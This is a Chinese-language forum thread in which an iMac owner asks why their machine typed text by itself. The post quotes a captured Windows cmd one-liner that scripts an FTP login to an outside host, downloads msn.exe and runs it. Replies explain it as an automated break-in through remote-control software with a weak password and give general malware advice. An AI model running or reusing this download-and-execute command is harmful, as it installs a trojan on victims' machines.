發生過三次還四次
在用的時候iMac突然自己動起來 感覺好像有隻無形的手在搶按鍵盤一樣一直在送字串出去
不得已只好關機重開就正常了
昨天晚上好像又發生了一次 這次大概游標正好停在gmail的對話視窗裡
結果iMac自己打的字串就正好被紀錄下來了

"cmd /c echo open windowscenter.net 21 >> ik &echo user user 456654789 >> ik &echo binary >> ik &echo get msn.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &msn.exe &exit
echo You got owned"

從其中的幾個字知道之前幾次狀況應該也是在送這一串字
不知道有沒有高手知道這是怎麼回事啊
文章關鍵字
趕快打蘋果技術支援電話問問

Apple 技術支援專線
技術支援 (Technical Support)
886-0800-095-988
星期一至五 (Mon-Fri)
9AM-9PM
星期六、日 (Sat-Sun)
9AM-6PM
來杯咖啡吧!! 我請客!!
我無法完全確定它的全意
它嘗試開啟cmd並連接ftp下載msn.exe最後執行該程式
如果你在osx狀況下~~嗯~~別太擔心
它應該是透過遠端操作軟體近來,而你使用太簡單密碼就被猜中
如果在win底下~要很擔心
可能是透過某個程式甚至是某個網頁的程式碼近來的
當然vnc也是有可能的
如果有防毒防木馬就開來掃看看,如果沒有抓到
那重裝比去抓這隻來的簡單也乾淨
參考一下~
好神奇...

對 Unix command 不熟,然而 echo 應該是顯示文字的命令,cmd 是 windows 底下的命令,msn.exe 也是只能在 windows 底下執行,在 MacOS 底下是沒有意義的。

看起來是連上 windowscenter.net port 21?

真的好像中毒...你是在 MacOS 底下,還是開 VM 的模擬 windows 出現這些文字?

應該是中了windows的毒阿
但怎麼會有人寫病毒還要echo勒?
放心啦
Mac OS X是基於Unix所以可以不用擔心windows的病毒
但是要小心Java的病毒喔!
感謝樓上的幾位好心人回答

這狀況是在OSX底下發生的 有灌VMware跑XP
昨天晚上VMware是開著的 不過裡面的XP是休眠的狀態

遠端軟體部份 我有開著Teamviewer沒有錯 PW是他自己指定的 不知道跟這個有沒有關係

掃毒軟體...我再花點時間找找看好了 好像沒看過有這種東東啊 XD

看起來各位高人都覺得不用太擔心
我還沒重灌過 (用Mac的人應該都很少有重灌的經驗吧 ) 所以先不重灌好了
如果有新的發展再上來跟各位高人討教..... 謝謝大家
不是病毒, 是遠端遙控軟體被駭客入侵.
對方是 Script 寫的自動程式掃到你的 port 開著, 密碼又沒改, 就自動進入企圖 download 木馬來安裝.
不過因為你是 Mac , 所以不會有事, 趕快改掉密碼吧.


單眼、單車、單身旅行 wrote:
不是病毒, 是遠端...(恕刪)

原來是 遠端遙控軟體被駭客入侵.
誰說MAC不會中毒
曾被植入遠端遙控軟體,植入木馬接著信箱被鎖
信箱裡有封勒索信等著你,系統重新安裝比較保險

檔案夾內出現怪怪的文件.看不懂的檔名就要注意
sk23746 wrote:
誰說MAC不會中毒...(恕刪)
Mac是不會中win病毒 OSX病毒還是會中
只是網路上九成病毒幾乎是win 加上OSX病毒很少

所以OSX是中毒機率很低 不是不會中毒

-------------------

◎這種多半不是中毒 是猜密碼 全系統共通 被猜中就有帳號權限

另外全系統共通還有
◎木馬方式的程式安裝 騙使用者點下安裝 獲取軟體權限
(木馬程式有分win或OSX系統 最常見的在OSX下載win木馬沒用處 以及在win下載win木馬中招)
(OSX下載到OSX木馬還是會中毒)
◎flash獲取權限
◎透過瀏覽器Java的病毒取得使用者權限

◎另外一種是雙系統使用者的中毒
與win共享權限的硬碟 也會被win勒索病毒加密
因為與win共享 OSX授權win系統抹寫共享磁區 就可以改變資料夾中檔案
在共享磁區 加密製作勒索用檔案 砍原檔

簡單講
win中勒索病毒禍延與OSX通用的共享磁區
所以不要在OSX給win模擬器太多權限
不要給win能讀取OSX磁碟的功能
(不要安裝OSX磁碟辨識驅動程式 使OSX磁碟出現在win的我的電腦中)
用OSX會安全一點
                              彈幕濃!
關閉廣告
文章分享
評分
評分
複製連結

今日熱門文章 網友點擊推薦!